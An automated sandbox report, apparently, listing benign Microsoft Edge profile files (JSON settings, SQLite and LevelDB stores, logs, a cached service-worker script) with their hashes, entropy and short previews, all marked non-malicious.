                                                                                                                                                                                                                                                SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                Entropy (8bit):1.2784336308670714
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSlAWg:uIEumQv8m1ccnvSX+DJii7MM1a
                                                                                                                                                                                                                                                MD5:31DAA2610D89821A5D1ECA55A7532C23
                                                                                                                                                                                                                                                SHA1:C60CDE590AE0B22519FFE592AEF762E08285691E
                                                                                                                                                                                                                                                SHA-256:DF14A9AA78680C2D616CDEAF12C9086438111AF8C9A2813F409034F5DCF7CF09
                                                                                                                                                                                                                                                SHA-512:3AAD920B8DAD7339DC294E6EB1B5C707200DC8024053FD067802F11B752F831DDAD64113312D8CC61E368D1822B6625F0126B30749412BA90319C1D09BE9E4FC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1618
                                                                                                                                                                                                                                                Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):1768
                                                                                                                                                                                                                                                Entropy (8bit):5.296494009914711
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YcCpfgCzsYtsCfcKs0leeBkBRsF1CgHYYhbyD0:F2fXlvkeBkBUT5hn
                                                                                                                                                                                                                                                MD5:77EB241FB642EB6E04FD5B6B163D587D
                                                                                                                                                                                                                                                SHA1:C473C0FCC5EDA444D6BA9193B9C3B4DE6B18FCD8
                                                                                                                                                                                                                                                SHA-256:5192B94163C514B6D487201A00F8C5191B0AF7D9A2518005581C8CFEE0B523BC
                                                                                                                                                                                                                                                SHA-512:FA18BBF54DCF998660C147C4DD31809DB6A8614BBDE2CD426801996205544D3A6D2CD9D0594984E877306EAB6561933E7DA1FDDEC788F936AF8E575CEA651035
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381430851389649","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381430855621307","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378932458430701","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9682
                                                                                                                                                                                                                                                Entropy (8bit):5.108504244397563
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdkdpbsH7RyaNP9k7Se8VpbV+Fa2QAwT+PHYJ:stdQbsHltJjbGLQxr
                                                                                                                                                                                                                                                MD5:FE7B66572E64EEF775CAC92773270830
                                                                                                                                                                                                                                                SHA1:3608D9E229490604B724DA267A3AC4E70906ACA5
                                                                                                                                                                                                                                                SHA-256:473DED48B8E775A0A4757361B6A4DC2C3D962AC9540140D050A18733080B1458
                                                                                                                                                                                                                                                SHA-512:2BEB82B93A0DDAC97C76D3FA045DEEA148D17F6EEEBD02E819865BA523745926D273B0E17EA8D5DE4A3CFDE6BF27398208C527C1FB8DD2E7E86ECD328AD1D416
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                Entropy (8bit):5.566953684472815
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:NX2FQaWP8efkr8F1+UoAYDCx9Tuqh0VfUC9xbog/OVHaWQzrwepwtur:NX2FQaWP8efkru1jayHQIZt4
                                                                                                                                                                                                                                                MD5:EB36A55DF7873B903A0EDF748451A0D7
                                                                                                                                                                                                                                                SHA1:8A432A926C5EC1A25EAE9FB0B56461ADF81CB720
                                                                                                                                                                                                                                                SHA-256:1C19BE7282B537361E9CA63051D591F5B548D9F8ED9BD67829F9037976C4BCAD
                                                                                                                                                                                                                                                SHA-512:5F473F89DC3B842CCFAE04FDB3A08C79DDD0795823F059F4C915A770DE8B0C86B13D369EEA06BE27891E0D5A62970FB98475605EE1FFC8704D7A315FF4F78D1D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378838846714906","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378838846714906","location":5,"ma
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):228
                                                                                                                                                                                                                                                Entropy (8bit):4.7400908617769035
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkX/8Ct//lFl46JKcZt/FlSFdVVl03nUBcisdty:chXUQI2xH8BzNme/8HILSFd4ddAa1M/
                                                                                                                                                                                                                                                MD5:0232AE7084C463F1F077141AE2F8E4EA
                                                                                                                                                                                                                                                SHA1:4B45C6DE4CE2895BD60C2EFB636D95EA6C9EF7F5
                                                                                                                                                                                                                                                SHA-256:684BB89AC899552393B84CA6F1831E6B2939189427D6585B24BA195F9C89E386
                                                                                                                                                                                                                                                SHA-512:B2DFA94D7B0EB98F28E8DCC4909CCD4E87424470941DB136E3E36A975AAECCFD92AB8F9109544065FBE66DF8AEC0BC24554A0BA39BBEA9D20A17D95242FDE478
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..?..................URES:0..PRES:0.t.g.;................REG:https://ntp.msn.com/.0..REGID_TO_ORIGIN:0..b8...............J4...................PRES:0
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):305
                                                                                                                                                                                                                                                Entropy (8bit):5.167438340001241
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/kcM1cNwi23oH+TcwtE/a252KLlp/kA4q2PcNwi23oH+TcwtE/a2ZIFUv:7/kc2ZYeb8xLT/kPvLZYeb8J2FUv
                                                                                                                                                                                                                                                MD5:D284A4061CB07658ACF46A2E5C0C912E
                                                                                                                                                                                                                                                SHA1:E40433990D998EE34389EB7A1FA084E88A4459EA
                                                                                                                                                                                                                                                SHA-256:0CA56D8851BA10BF647EDA7A74159CF96FE85A82CE67E0D3725341F6FB8B22D3
                                                                                                                                                                                                                                                SHA-512:B72321AB412B1997AC99DA16F312F5ECF37521ED5520A5D80990E9E8C0056EAF779D4D08876A2FDEFE8C6F3010A306BE7D101071728F30E4B60076E745D08F2A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:45.417 1784 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/16-11:07:45.447 1784 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):85720
                                                                                                                                                                                                                                                Entropy (8bit):5.602675661229336
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/rmL/rBZXECjPXNtSsNFPQoiD:B9LyxPXfOxr1lMe1nL/CL/TXE6tc
                                                                                                                                                                                                                                                MD5:7D87CA230C3C23388CCFCDCBBFAFEC38
                                                                                                                                                                                                                                                SHA1:2F36DA98905A64201FBFEF962356F5FBD58389E1
                                                                                                                                                                                                                                                SHA-256:9FD0AD9ED8AC76483E85585E9E40DD11CB3048F33121B9AB7EE970E0121CC216
                                                                                                                                                                                                                                                SHA-512:A3ED3859F2D89D84931B8F44C1F5C2C0FA503A8AB6BAC07EFF21F1DAB820B3FFF4978D885019539AF1914196ED727AC166F3308F61E22CF93586B624E980B777
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:0\r..m..................
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):48
                                                                                                                                                                                                                                                Entropy (8bit):2.9972243200613975
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:WDbsFjE3lHq4:WDIqE4
                                                                                                                                                                                                                                                MD5:C55D41554AFCFFE6CB2E81D77DE70607
                                                                                                                                                                                                                                                SHA1:AC4D7F50C1C64A4C8528CB4F1540EFDA39E5A2F6
                                                                                                                                                                                                                                                SHA-256:151FDDB45D3050E474338C1B3430583C244C40034143011BF11EFBDAFA64D2A2
                                                                                                                                                                                                                                                SHA-512:D9BF9411AE4409A2C75F28183EFCB4A6A95E306B55E840130D0026AAD5709F8979CD1661AA87D860A86779314B8869820CD6A307D342B9859F7E2C8DB7915E30
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:(...Kf.moy retne.........................z%.../.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):7225
                                                                                                                                                                                                                                                Entropy (8bit):3.3551770310966345
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:CvjKYnsR6r899Xp+VKiD5SLl9iSrW5Zvp8dU:Cvj9G9Xp+we5SLl9iSrOZvC6
                                                                                                                                                                                                                                                MD5:BFEC807B1D3066718845230B07AA7A6C
                                                                                                                                                                                                                                                SHA1:20549FA14823D77465F1E8DAF2FEF510A21CCD40
                                                                                                                                                                                                                                                SHA-256:097E4F9B5DAEB97E64B1FBBA7E4B21FC806701BB7A8712299192C48BEC10A1B2
                                                                                                                                                                                                                                                SHA-512:43C4F94D6B7B88106CE415253E401B1AD6E4F7FDF3062007B9B84D947E47538DDC0E45E6530A0BDE738285A522F815B11E58078CBB92DB8B3692808AA83F28ED
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............G.`"b................next-map-id.1.Cnamespace-8c8f4e83_e882_4d8b_a34f_6f86abb2a21d-https://ntp.msn.com/.0V.e................V.e................V.e................l.I..................map-0-shd_sweeper.5{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.h.p.-.h.a.s.p.o.l.l.,.p.r.g.-.s.e.a.r.c.h.n.e.w.t.,.p.r.g.-.p.o.l.i.s.h.e.d.-.s.t.y.l.e.s.,.p.r.e.p.r.g.-.1.s.w.-.s.a.q.-.c.i.p.t.1.,.p.r.e.p.r.g.-.1.s.w.-.s.a.e.e.g.t.a.t.2.,.p.r.g.-.1.s.w.-.s.a.-.d.n.n.-.r.m.-.c.a.l.i.b._.t.2.,.p.r.g.-.1.s.w.-.a.b.r.t.p.g.-.r.,.p.r.g.-.1.s.w.-.r.e.v._.a.b.r.t.p.g.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                Entropy (8bit):5.188468338418956
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/rKi+q2PcNwi23oH+TcwtrQMxIFUt8O/i8WZmw+O/2VkwOcNwi23oH+TcwtrQMT:7/x+vLZYebCFUt8O/s/+O/2V54ZYebtJ
                                                                                                                                                                                                                                                MD5:909B9C981BF8086364FC77FB02589820
                                                                                                                                                                                                                                                SHA1:E57D3D8A45210CB66078DDDFF80399FA851A8D29
                                                                                                                                                                                                                                                SHA-256:101243E7C4B38B97A1CA03FAA66165EC5EA8EC9F70E5789EFE6C07747406D9F9
                                                                                                                                                                                                                                                SHA-512:0CF9B64CB1A5EC76FC43B27EC7F4958CA0159C92FF08022B0EC8A42FF5EE9593C7E7F55933D9B660A4F86F95DF15591E2486B44836DA67E65D186BA34BAD7C74
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.399 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/16-11:07:27.536 1b0c Recovering log #3.2024/12/16-11:07:27.541 1b0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                Entropy (8bit):3.8034215834102265
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:3/N6dO8HuWjCpsAF4unxDKtLp3X2amEtG1ChqsA6WX+QKkOAM4Y:3/YOECzFgLp2FEkCh/VYHOpJ
